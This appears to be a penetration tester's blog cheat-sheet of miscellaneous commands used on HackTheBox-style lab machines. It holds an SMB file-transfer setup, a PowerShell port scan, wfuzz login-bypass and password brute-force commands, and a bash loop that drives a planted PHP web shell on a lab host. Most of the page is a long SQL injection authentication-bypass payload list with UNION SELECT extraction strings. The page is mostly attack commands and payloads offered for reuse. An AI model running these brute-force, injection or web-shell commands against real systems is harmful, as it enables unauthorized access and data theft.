Home Miscellaneous
Post
Cancel

Miscellaneous

Miscellaneous

Here I’ll show some examples of miscellaneous tools and commands that I common use.

Summary

File Transfer

Commands used to make file transfer between boxes

Windows File Transfer

You can make a file transfer using samba share from impacket and powershell, and then easily get and send files to the remote server

On Windows Box

$pass = convertto-securestring '123456' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('0x4rt3mis', $pass)

On Kali Box we start the impacket smb server

1
impacket-smbserver kalishare . -username 0x4rt3mis -password 123456

Now we enable the samba share on Windows

New-PSDrive kalishare -PSProvider FileSystem -Credential $cred -Root \\10.10.16.5\kalishare

Or

net use \\10.10.16.5\kalishare /u:0x4rt3mis 123456
cp archive.zip \\10.10.16.5\kalishare

Commands

Let’s jump in.

Powershell

Get the size of folders

Get-ChildItem -Recurse 'C:\inetpub\wwwroot' | Measure-Object -Property Length -Sum

Zip Folder

Compress-Archive -Path .\htdocs -DestinationPath archive.zip

Port Scan

8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("ip",$_)) "Port $_ is open!"} 2>$null

Gobuster

1
gobuster dir -u http://x.x.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30

Wfuzz

Login Bypass

1
wfuzz -z file,list.txt -d "username=adminFUZZ&password=admin" --hc 200 http://10.10.10.185/login.php

Vhost Fuzzing

1
wfuzz -u http://10.10.10.208 -H "Host: FUZZ.crossfit.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 10701

Password Bruteforce

1
wfuzz -c -z file,common.txt --hh 18170 -d "Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeOffset=240&User=root@localhost&Password=FUZZ" http://192.168.8.9/admin.php

Bash Misc

Find

1
find . -type f -newermt 2018-12-19 ! -newermt 2018-12-21 -ls

Grep Awesome

1
grep -l -R -e "\$_GET\['doc'\]" $(grep -l -R -e "\$_GET\['app'\]" `grep -l -R -e vqmods`)

Small ssh key

1
ssh-keygen -t ed25519 -f 0x4rt3mis

Pseudo WebShell PHP

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash
# 0x4rt3mis
# Shell "pseudo" - Compromissed HackTheBox

echo "exit for exit"
input=""
while [ "$input" != "exit" ]
do
    echo -n "> "
    read input
    curl -GET http://10.10.10.207/shop/vqmod/xml/payload.php --data-urlencode "cmd=$input"
done

Python Virtual Env

1
2
3
virtualenv -p python2.7 exploit
cd exploit
source bin/activate

Wordlist Auth Bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
" "
" #
" --
"&"
"*"
"-"
"/*
"^"
'
' #
' '
' -
' --
'#
'&'
'*'
'-'
'--
'/*
'^'
=
==
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1?) and '1?='1-
admin" #
admin" --
admin"/*
admin' #
admin' --
admin'/*
admin' and substring(password/text(),1,1)='7
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin"or 1=1 or ""="
admin'or 1=1 or ''='
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
 and 1=1
 and 1=1-
' and 1='1
' and a='a
' and 'one'='one
' and 'one'='one-
' and substring(password/text(),1,1)='7
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
 like '%'
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""="
" or ""^"
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
'="or'
 or 0=0 #
 or 0=0 -
 or 0=0 --
" or 0=0 #
" or 0=0 -
" or 0=0 --
%' or '0'='0
' or         0=0 #
' or 0=0 #
' or 0=0 -
' or 0=0 --
 or 1=1
 or 1=1#
 or 1=1-
 or 1=1--
 or 1=1/*
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or 1=1
" or 1=1 -
" or 1=1 --
" or 1=1#
" or 1=1-
" or 1=1--
" or 1=1/*
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1?='1
' or 1=1
' or 1=1 -
' or 1=1 --
' or 1=1#
' or 1=1-
' or 1=1--
' or 1=1/*
' or 1=1;#
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
'or'1=1
'or'1=1?
) or '1?='1-
) or ('1?='1-
or 1=1
or 1=1#
or 1=1--
or 1=1/*
'OR 1=1--
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
"or 1=1 or ""="
'or 1=1 or ''='
" or "a"="a
") or ("a"="a
' or 'a'='a
' or a=a-
' or a=a--
') or ('a'='a
') or ('a'='a and hi") or ("a"="a
'OR '' = '	Allows authentication without a valid username.
'=' 'or' and '=' 'or'
' or 'one'='one
' or 'one'='one-
 or true
" or true--
") or true--
' or true--
') or true--
or true--
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
' OR 'x'='x'#;
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
' UNION select table_schema,table_name FROM information_Schema.tables;#
<username>'--
<username>' OR 1=1--

Apt Proxy

1
2
ssh -g -D 8000 kali@127.0.0.1
echo "Acquire::http::proxy \"socks5h://server:8000\";" > /etc/apt/apt.conf
This post is licensed under CC BY 4.0 by the author.